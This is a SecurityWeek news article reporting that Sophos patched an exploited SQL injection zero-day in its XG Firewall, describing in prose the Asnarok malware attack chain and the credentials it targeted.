Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Malware Delivered to Sophos Firewalls via Zero-Day Vulnerability

Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.

Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.

Sophos said it learned about attacks targeting its XG firewall on April 22 after a suspicious field value was discovered in a device’s management interface. An investigation revealed that attackers have been exploiting a previously unknown SQL injection vulnerability to hack exposed physical and virtual firewalls. Multiple customers were targeted.

According to the company, the attack was aimed at systems with the administration service or the user portal exposed to the internet. The attackers were apparently trying to exploit the security hole to download malware that would allow them to exfiltrate data from the firewall.

This data can include usernames and password hashes for the local device administrators, portal admins, and user accounts set up for remote access. The malware could have also gained access to information about the firewall, email addresses of accounts stored on the appliance, and information on IP address allocation permissions.

“Passwords associated with external authentication systems such as AD or LDAP are unaffected,” Sophos told customers.

Sophos started taking measures shortly after the attack started and it rolled out a SFOS hotfix that patches the SQL injection vulnerability on April 25. Once they have applied the hotfix, users are also informed if their firewall has been compromised as part of this attack.

In a blog post published late on Sunday, Sophos revealed that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote server. The script then executed more SQL commands and dropped more files onto the virtual file system.

Other scripts deployed in the attack were designed to ensure persistence across device reboots and for creating a backup channel.

“The Install.sh script, initially, ran a number of Postgres SQL commands to modify or zero out the values of certain tables in the database, one of which normally displays the administrative IP address of the device itself,” Sophos researchers explained. “It appears that this was an attempt to conceal the attack, but it backfired: On some appliances, the shell script’s activity resulted in the attacker’s own injected SQL command line being displayed on the user interface of the firewall’s administrative panel. In place of what should have been an address, it showed a line of shell commands.”

Sophos has dubbed the malware involved in the attack Asnarok and attributed the operation to an “unknown adversary.”

“There was significant orchestration involved in the execution of the attack, using a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for a firewall operating system,” the company explained.

In the initial version of its advisory, Sophos said it had no evidence that the hackers accessed anything on the local networks behind the targeted firewalls, but that sentence was later removed without additional clarifications. The subsequent blog post does say that there is no evidence that the data collected from firewalls was actually exfiltrated.

The cybersecurity firm has published indicators of compromise (IoC) and technical details about the attack. The company says customers whose firewalls have not been compromised do not need to take any action. Users who are informed that their firewalls have been targeted in this attack will need to change their passwords on the device.

Related: Critical Flaw in Sophos Cyberoam Appliances Allows Remote Code Execution

Related: Sophos Patches Privilege Escalation Flaws in SafeGuard Products

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Expert Insights

Related Content

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Mobile & Wireless

Technical details published for an Arm Mali GPU flaw leading to arbitrary kernel code execution and root on Pixel 6.

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

Mobile & Wireless

Apple’s iOS 12.5.7 update patches CVE-2022-42856, an actively exploited vulnerability, in old iPhones and iPads.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Vulnerabilities

Security researchers have observed an uptick in attacks targeting CVE-2021-35394, an RCE vulnerability in Realtek Jungle SDK.